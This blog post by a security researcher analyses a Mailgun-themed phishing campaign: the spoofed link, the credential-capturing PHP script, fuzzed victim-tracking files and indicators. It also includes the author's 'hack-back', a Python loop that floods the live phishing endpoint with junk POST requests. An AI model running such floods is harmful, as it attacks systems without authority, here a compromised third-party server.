image

Introduction

Recently Mailgun security team published an article on their blog warns internet users about new scammed email messages targeting users and describe how much these messages are becoming legitimate and even make it worse for users to know if it is legitimate or fake.

While I was reading some of the received emails, I came across one of the most interesting and well-done phishing templates that could easily trap people who don't have enough knowledge to fall in. so in this research paper, I will spot the light on very tricky new Mailgun phishing campaigns targeting thousands of internet users daily.

I am sure that many users have received an email message saying, " there is a receipt for your Mailgun subscription.." or "invoice is available to view," ..etc. Actually, I received that same email message, and it was tricky to make me think that the message was too legitimate to believe it.

image

If we notice the link's text, it is actually an official web address of the Mailgun Application. If we clicked on that link to see where it goes, it would redirect the user into another eye-catching web address, and a normal user will not be able to detect that it was a scam. The malicious site design comes with the same design as the Mailgun application portal. But Still, if we have a closer look into the spoofed link, it is obviously not related to Mailgun official link.

image At this moment, I have figured out that this is a phishing attempt, and it was part of the same phishing campaign operation which security researchers spotted in Jun 2020, but no one tries to trace the people behind it or to collect some footprints. That's why I have decided to take down their operation and reveal the technical part of this attack.

To deliver a message, " Don't play with Hackers ..maybe we should film a documentary to deliver this message !"

Technical Analysis

Message Template

I will start analyzing the message template as it was a real trap for many internet users, so if we look into the message as shown in the following (figure 1.3)

image                                                                                      (figure 1.3)

We can observe the difference between the link's text label and the address shown on the chrome address status bar. The scammers behind this operation have made eye drop attacks by deceiving users with the same legitimate link. At the same time, it redirects visitors to a different link (malicious one). image

Message Malicious indicators

  • The sender Address address is spoofed and not related to the support team of Mailgun.
  • A malicious embedded link contains the following address "app.mailgun.com.new-session.onswixx.254.bedstay41.com."

Application analysis

Basically, I want to do more analysis of their application to collect more information as I want to give a hit back to them. I looked into phishing page sources to inspect for interesting hidden juicy information. According to (figure 1.4) we can notice how they use the simple PHP script "ok.php" to capture the entered credentials and store them on their databases.

image                                                                                                           (figure 1.4 )

with little help of BurpSuite, we can have a closer look at what's happening exactly when we submit some information, as shown below (figure 1.5) image

(figure 1.5)

so, in summary, the script will capture what you have typed in the username and password field and then sniff the other values(c1,c2,c3) from the URL as detailed in (figure 1.6)

image

(figure 1.6)

These parameter values help the scammers know who got infected/clicked/visited the malicious link. and organize their work logics.

Fuzzing

like any enumeration process, fuzzing files and directories help to discover hidden information or sensitive files. Besides, it could help to visualize and understand how this application works and its internal design structures.

So I started to perform fuzzing, and I have used a big wordlist for content discovery (SecList's "big.txt") and as usual, I have found some of the exposed application files as shown in the following (figure 1.7)

image                                                                                                                                             (figure 1.7)

what I have understood from this phishing script's structure that it stores victims' information who clicked on any malicious link from their mailbox and then assigned a unique hash key per infected person by storing it on a file named "emailClicker.txt." By this tactic helps scammers to attack the victim again with a different phishing campaign. That's the reason why if you got phished once, you might receive a lot of emails in the future.

Application logic attack

if we go back again into the POST request handled by this PHP script file "ok.php," I have noticed there is no CSRF token being assigned for each request, which means if we can send multiple requests into the server to check if the application is vulnerable to "missing rate limitation attack."

If you are not familiar with "Missing Rate Limitation," you can check the following published hacker-one report ( Link). After testing the attack again, I have found out that lucky this application is vulnerable. There is no timeout limitation after sending 100 requests.

May you will ask yourself, what the benefit of doing this type of attack? I want to answer this question by saying filling in their DB with 10000 random records or more. Could lead to interruption of the service or corruption due to an unhandled amount of data rendering.

to speed up the process, I have coded a simple python script to automate the infinite loop process. (figure 1.8 )

#!/bin/python

import requests

headers = {'User-Agent': 'Mozilla/5.0'}
payload = {'username':'0xsp@0xsp.com','password':'12312345615','c1':'2ebd2d3b5f6744d429de59ec57b26c01','c2':'36c80420beacf8cc9531991a82ea44de','c3':'eaa2458fc49d7d44bb91d89d955778$
link    = 'http://app.mailgun.com.new-session.onswixx.254.bedstay41.com/mailgun.com/com/ok.php'

i = 0
while True:
     try:
        print("Sending requests - exploiting Missing Rate Limitation")
        session = requests.Session()
        resp    = session.get(link,headers=headers)
        cookies = requests.utils.cookiejar_from_dict(requests.utils.dict_from_cookiejar(session.cookies))
        resp    = session.post(link,headers=headers,data=payload,cookies =cookies)
        session.get(link)
        i+=1
     except requests.exceptions.RequestException as e :
         print (e)

image

The attack sent more than 10000 requests, and I am sure their DB is a total mess now; that's not enough for me as I did some enumeration of their DNS records and found out that they were hosting their application in one of the compromised servers hosted by Leaseweb. That's great!

After that, I decided to report that to the Hosting provider, so I have contacted LeaseWeb's phishing prevention team with a detailed description. Obviously, they have disabled the malicious script and removed the host.

image

IOC

app.mailgun.com.new-session.onswixx.xx .. 
ok.php 
new.php
ipClicker.txt
emailClicker.txt
detect.php
/mailgun.com/

Lawrence Amer
offensive security expert and founder of 0xsp security research and development (SRD), passionate about hacking and breaking stuff, coder and maintainer of 0xsp-mongoose RED, and many other open-source projects
CONTACT ME